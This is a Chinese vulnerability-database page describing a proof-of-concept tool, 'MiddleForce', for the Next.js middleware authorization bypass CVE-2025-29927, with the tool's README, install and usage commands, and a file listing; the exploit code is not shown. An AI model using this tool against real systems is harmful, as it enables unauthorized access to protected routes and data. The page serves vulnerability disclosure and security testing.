漏洞平台

POC详情： 5c3a3574225c510bb5a153e7b9a0fe85c3c52d59

来源

https://github.com/diogolourencodev/middleforce

关联漏洞

标题： Next.js 安全漏洞 (CVE-2025-29927)
描述：Next.js是Vercel开源的一个 React 框架。 Next.js 14.2.25之前版本和15.2.3之前版本存在安全漏洞，该漏洞源于如果授权检查发生在中间件中，可能绕过授权检查。

描述

Simple script to attempt a Bypass on a server possibly vulnerable to CVE-2025-29927 (Next.js Middleware)

介绍

# MiddleForce

<div align="center">
  <img src="https://img.shields.io/badge/Python-3.x-blue.svg" alt="Python 3.x">
  <img src="https://img.shields.io/badge/License-MIT-green.svg" alt="License MIT">
  <img src="https://img.shields.io/badge/CVE-2025--29927-red.svg" alt="CVE-2025-29927">
</div>

## 🔍 Overview

MiddleForce is a specialized security testing tool designed to detect and exploit the CVE-2025-29927 vulnerability in Next.js middleware. This tool helps security professionals identify applications vulnerable to middleware bypass attacks.

## 🚀 Features

- **Middleware Bypass Detection**: Automatically tests for Next.js middleware bypass vulnerabilities
- **Colored Output**: Clear visual indicators for vulnerable and non-vulnerable routes
- **Simple CLI Interface**: Easy-to-use command line arguments
- **Multiple Headers Testing**: Tests various bypass techniques

## 📋 Requirements

- Python 3.x
- Required packages:
  - colorama
  - requests
  - argparse

## 💻 Installation

### Automatic Installation (Linux)

```bash
git clone https://github.com/diogolourencodev/middleforce.git
cd middleforce
chmod +x install.sh
./install.sh
```

### Manual Installation

```bash
git clone https://github.com/diogolourencodev/middleforce.git
cd middleforce
pip install -r requirements.txt
```

## 🔧 Usage

```bash
# Basic usage
python3 middleforce.py -t http://example.com/api/dashboard

# If installed globally on Linux
middleforce -t http://example.com/api/dashboard
```

## 📊 Output Interpretation

- **Green Output**: Vulnerable route detected - middleware bypass successful
- **Red Output**: Not vulnerable - either public route or middleware working correctly
- **Cyan Output**: Informational messages or unexpected responses

## 🔒 Security Implications

CVE-2025-29927 allows attackers to bypass Next.js middleware protections by manipulating specific HTTP headers. This can lead to unauthorized access to protected routes, API endpoints, and sensitive data.

## 🤝 Contributing

Contributions are welcome! Feel free to submit pull requests or open issues to improve the tool.

## 👤 Author

Created by [Diogo Lourenço](https://github.com/diogolourencodev)

---

<div align="center">
  <p>If you found this tool useful, please consider giving it a star ⭐</p>
</div>

文件快照


 [4.0K]  /data/pocs/5c3a3574225c510bb5a153e7b9a0fe85c3c52d59
├── [ 240]  install.sh
├── [3.1K]  middleforce.py
├── [2.3K]  README.md
└── [  28]  requirements.txt

0 directories, 4 files

神龙机器人已为您缓存

备注

1. 建议优先通过来源进行访问。

2. 如果因为来源失效或无法访问，请发送邮箱到 f.jinxu#gmail.com 索取本地快照（把 # 换成 @）。

3. 神龙已为您对POC代码进行快照，为了长期维护，请考虑为本地POC付费，感谢您的支持。